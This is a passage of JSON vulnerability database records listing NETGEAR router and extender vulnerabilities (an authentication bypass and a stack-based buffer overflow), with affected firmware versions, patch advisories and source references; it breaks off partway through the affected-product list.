"db": "CNVD",
"id": "CNVD-2020-31319",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1876",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31319"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014919"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1876"
},
{
"db": "NVD",
"id": "CVE-2017-18772"
}
]
},
"id": "VAR-202004-1337",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31319"
}
],
"trust": 1.05125455
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31319"
}
]
},
"last_update_date": "2024-11-23T22:05:40.331000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Authentication Bypass on Some Routers and Extenders, PSV-2017-0424",
"trust": 0.8,
"url": "https://kb.netgear.com/000051471/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-and-Extenders-PSV-2017-0424"
},
{
"title": "Patch for Multiple NETGEAR product authorization issue vulnerabilities (CNVD-2020-31319)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/220069"
},
{
"title": "Multiple NETGEAR Product Authorization Issue Vulnerability Fixing Measures",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=117221"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31319"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014919"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1876"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014919"
},
{
"db": "NVD",
"id": "CVE-2017-18772"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18772"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000051471/security-advisory-for-authentication-bypass-on-some-routers-and-extenders-psv-2017-0424"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-18772"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-31319"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014919"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1876"
},
{
"db": "NVD",
"id": "CVE-2017-18772"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-31319"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-014919"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1876"
},
{
"db": "NVD",
"id": "CVE-2017-18772"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-06-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-31319"
},
{
"date": "2020-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014919"
},
{
"date": "2020-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1876"
},
{
"date": "2020-04-22T15:15:11.800000",
"db": "NVD",
"id": "CVE-2017-18772"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-06-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-31319"
},
{
"date": "2020-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-014919"
},
{
"date": "2020-04-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1876"
},
{
"date": "2024-11-21T03:20:52.860000",
"db": "NVD",
"id": "CVE-2017-18772"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1876"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Authentication vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-014919"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1876"
}
],
"trust": 0.6
}
}
var-202004-1529
Vulnerability from variot
Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D8500 before 1.0.3.42, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300-2CXNAS before 1.0.3.60, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R7000P before 1.3.1.44, R6900P before 1.3.1.44, R7100LG before 1.0.0.46, R7300 before 1.0.0.68, R7900 before 1.0.2.10, R8000 before 1.0.4.18, R8000P before 1.3.0.10, R7900P before 1.3.0.10, R8500 before 1.0.2.122, R8300 before 1.0.2.122, RBW30 before 2.1.2.6, WN2500RPv2 before 1.0.0.54, and WNR3500Lv2 before 1.2.0.56. plural NETGEAR The device is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR D8500, etc. are all products of NETGEAR. NETGEAR D8500 is a wireless modem. WNR3500L is a wireless router. NETGEAR EX3700 is a wireless network signal extender. The vulnerability stems from the fact that the network system or product performs an operation on the memory, and the data boundary is not correctly verified, resulting in an incorrect read and write operation to other associated memory locations. This affects D8500 prior to 1.0.3.42, EX3700 prior to 1.0.0.70, EX3800 prior to 1.0.0.70, EX6000 prior to 1.0.0.30, EX6100 prior to 1.0.2.24, EX6120 prior to 1.0.0.40, EX6130 prior to 1.0.0.22, EX6150 prior to 1.0.0.42, EX6200 prior to 1.0.3.88, EX7000 prior to 1.0.0.66, R6250 prior to 1.0.4.26, R6300-2CXNAS prior to 1.0.3.60, R6300v2 prior to 1.0.4.28, R6400 prior to 1.0.1.36, R6400v2 prior to 1.0.2.52, R6700 prior to 1.0.1.46, R6900 prior to 1.0.1.46, R7000 prior to 1.0.9.28, R7000P prior to 1.3.1.44, R6900P prior to 1.3.1.44, R7100LG prior to 1.0.0.46, R7300 prior to 1.0.0.68, R7900 prior to 1.0.2.10, R8000 prior to 1.0.4.18, R8000P prior to 1.3.0.10, R7900P prior to 1.3.0.10, R8500 prior to 1.0.2.122, R8300 prior to 1.0.2.122, RBW30 prior to 2.1.2.6, WN2500RPv2 prior to 1.0.0.54, and WNR3500Lv2 prior to 1.2.0.56
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1529",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "d8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.42"
},
{
"model": "ex3700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex3800",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex6000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "ex6100",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.24"
},
{
"model": "ex6120",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "ex6130",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "ex6150",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "ex6200",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.88"
},
{
"model": "ex7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.26"
},
{
"model": "r6300-2cxnas",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.60"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.36"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.28"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.1.44"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.1.44"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.46"
},
{
"model": "r7300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.68"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.10"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.10"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.0.10"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.122"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.122"
},
{
"model": "rbw30",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "2.1.2.6"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.56"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.28"
},
{
"model": "wn2500rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.42"
},
{
"model": "ex3700",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex3800",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex6000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.24"
},
{
"model": "ex6120",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "ex6130",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "ex6150",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.88"
},
{
"model": "ex7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.28"
},
{
"model": "r6400v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "wnr3500lv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.2.0.56"
},
{
"model": "wn2500rpv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.27"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.28"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.29"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.35"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.36"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.39"
},
{
"model": "ex3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "ex3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "ex3700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "ex3800",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "ex3800",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "ex3800",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "ex6000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "ex6000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.24"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.50"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.60"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.70"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.76"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.16 1.1.130"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.18"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.20"
},
{
"model": "ex6100",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.22"
},
{
"model": "ex6120",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "ex6120",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "ex6120",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.34"
},
{
"model": "ex6130",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "ex6130",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.16"
},
{
"model": "ex6150",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "ex6150",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.34 1.0.70"
},
{
"model": "ex6150",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.36"
},
{
"model": "ex6150",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.38"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.50"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.52"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.56"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.62"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.64"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.72"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.74"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.82 1.1.117"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.84"
},
{
"model": "ex6200",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.3.86"
},
{
"model": "ex7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.50"
},
{
"model": "ex7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "ex7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.60"
},
{
"model": "ex7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.6 10.1.12"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.14"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.16"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.20"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.36"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.06"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.6"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.8"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.8 10.0.77"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.12"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.18"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.22"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.4.24"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.12"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.24"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.32"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.36"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.42"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.18"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.30"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.32"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.34"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.44"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.2.46"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.30"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.36"
},
{
"model": "r6700",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.20"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.28"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.30"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.34"
},
{
"model": "r6900",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.62"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.22"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.3.0.8"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.3.0.18"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.3.0.20"
},
{
"model": "r6900p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.3.1.26"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.7.2 1.1.93"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.7.10"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.4"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.6"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.10"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.12"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.14"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.18"
},
{
"model": "r7000",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.9.26"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": null
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.58"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.62"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.0.86"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.2.0.22"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.3.0.8"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
"vendor": "netgear",
"version": "1.3.0.18"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 0.1,
